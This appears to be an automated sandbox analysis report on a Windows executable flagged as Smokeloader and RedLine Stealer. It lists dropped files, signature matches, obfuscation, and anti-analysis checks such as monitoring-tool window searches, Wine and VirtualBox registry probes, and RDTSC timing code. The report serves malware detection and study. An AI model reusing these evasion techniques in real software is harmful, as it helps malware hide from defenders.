Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D14350 0_3_04D14350
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403D20 0_2_00403D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402EC0 0_2_00402EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404F50 0_2_00404F50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00410900 0_2_00410900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A306 0_2_0041A306
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB87 0_2_0040EB87
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00415E19 0_2_00415E19
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EEC9 0_2_0040EEC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004156EE 0_2_004156EE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B690 0_2_0040B690
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_1000E184 0_2_1000E184
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_100102A0 0_2_100102A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAEE5A 0_2_00AAEE5A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A20315 0_2_00A20315
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0099DA9C 0_2_0099DA9C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0099A491 0_2_0099A491
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009954B8 0_2_009954B8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00991EBE 0_2_00991EBE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009390A7 0_2_009390A7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008258DC 0_2_008258DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009A10F3 0_2_009A10F3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0099C618 0_2_0099C618
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B782B 0_2_008B782B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00998A27 0_2_00998A27
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00944675 0_2_00944675
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0084C79E 0_2_0084C79E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0091C7F6 0_2_0091C7F6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0086FBEA 0_2_0086FBEA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0085252E 0_2_0085252E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00939B50 0_2_00939B50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0099397E 0_2_0099397E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094BB62 0_2_0094BB62
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B551B7 0_2_04B551B7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5EDEE 0_2_04B5EDEE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B53F87 0_2_04B53F87
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5B8F7 0_2_04B5B8F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B551B7 0_2_04B551B7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5F130 0_2_04B5F130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B65955 0_2_04B65955
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B60B67 0_2_04B60B67
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 04B5A9C7 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A760 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 04D19B60 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 10003160 appears 32 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 576
PE file contains executable resources (Code or Archives)
Source: file.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.2175678349.0000000005831000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000000.00000003.2175271863.00000000062A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000002.2405026187.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2403918298.0000000000EEC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402A20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EED1DE CreateToolhelp32Snapshot,Module32First, 0_2_00EED1DE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 0_2_00401940
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7568
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs Jump to behavior
Source: C:\Users\user\Desktop\file.exe Command line argument: emp 0_2_00408770
Source: C:\Users\user\Desktop\file.exe Command line argument: mixtwo 0_2_00408770
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe Virustotal: Detection: 50%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 576
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\eJeEe574sR26w1rs\Y-Cleaner.exe
Source: file.exe Static file information: File size 1990144 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: Raw size of whvqijov is bigger than: 0x100000 < 0x1b3a00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;whvqijov:EW;ikwniflt:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Binary contains a suspicious time stamp
Source: Y-Cleaner.exe.0.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: dll[1].0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe Static PE information: real checksum: 0x1f17a6 should be: 0x1ed21e
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: whvqijov
Source: file.exe Static PE information: section name: ikwniflt
Source: file.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D195F7 push ecx; ret 0_3_04D1960A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D3037D push esi; ret 0_3_04D30386
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A1F7 push ecx; ret 0_2_0040A20A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00421B7D push esi; ret 0_2_00421B86
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009BD4DA push ebp; mov dword ptr [esp], ebx 0_2_009BD513
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A710F0 push 00E9BCD2h; mov dword ptr [esp], edi 0_2_00A7115D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A1FCC0 push ecx; mov dword ptr [esp], 5FEE3031h 0_2_00A1FCE5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A1FCC0 push 753D2A01h; mov dword ptr [esp], edx 0_2_00A1FD0C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A08CC2 push eax; mov dword ptr [esp], ecx 0_2_00A08CC6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3ECD9 push 46A0A31Ah; mov dword ptr [esp], edx 0_2_00A3ED2F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C9017 push 612015EEh; mov dword ptr [esp], esp 0_2_009C908E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A11835 push eax; mov dword ptr [esp], ebp 0_2_00A11842
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A11835 push edx; mov dword ptr [esp], 5C6F12ACh 0_2_00A1185A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A11835 push 4D6D5E35h; mov dword ptr [esp], edx 0_2_00A118BA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A11835 push 0A243F34h; mov dword ptr [esp], ecx 0_2_00A118DD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009FA837 push ebp; mov dword ptr [esp], ecx 0_2_009FA87D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A69811 push esi; mov dword ptr [esp], edx 0_2_00A6984B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A69811 push 6DAA56D2h; mov dword ptr [esp], edi 0_2_00A69893
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A69811 push esi; mov dword ptr [esp], 2D5C0F00h 0_2_00A698AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3781C push 2FCDD974h; mov dword ptr [esp], edi 0_2_00A37824
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3781C push ecx; mov dword ptr [esp], esp 0_2_00A37844
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2C874 push 558CEE53h; mov dword ptr [esp], edx 0_2_00A2C8AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2C874 push edi; mov dword ptr [esp], esp 0_2_00A2C8B8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2C874 push eax; mov dword ptr [esp], edi 0_2_00A2C937
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A70C7F push esi; mov dword ptr [esp], ecx 0_2_00A70CA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A70C7F push esi; mov dword ptr [esp], edx 0_2_00A70D0A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A33442 push ecx; mov dword ptr [esp], ebx 0_2_00A334B3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A50451 push esi; mov dword ptr [esp], 62A28788h 0_2_00A5049E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A50451 push 018739BAh; mov dword ptr [esp], edx 0_2_00A50526
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A50451 push ecx; mov dword ptr [esp], esi 0_2_00A5054B
Source: file.exe Static PE information: section name: whvqijov entropy: 7.941395599436267
Source: Y-Cleaner.exe.0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr Static PE information: section name: .text entropy: 7.918511524700298
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Y-Cleaner.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Bunifu_UI_v1.5.3.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1] Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A60FA second address: 9A60FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 991A1C second address: 991A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A5143 second address: 9A5166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FFAA4B0AF20h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FFAA4B0AF16h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A5166 second address: 9A516A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A529E second address: 9A52A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAA4B0AF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A52A8 second address: 9A52B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAA4EF80C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A53E9 second address: 9A53F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FFAA4B0AF16h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A53F9 second address: 9A53FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A5534 second address: 9A554A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF22h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A554A second address: 9A5565 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFAA4EF80C6h 0x00000008 jmp 00007FFAA4EF80D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A5565 second address: 9A556A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A59B1 second address: 9A59D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FFAA4EF80C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAA4EF80D1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A59D0 second address: 9A59D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A59D6 second address: 9A59DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A59DC second address: 9A59E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8981 second address: 9A8986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A89D0 second address: 9A89D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
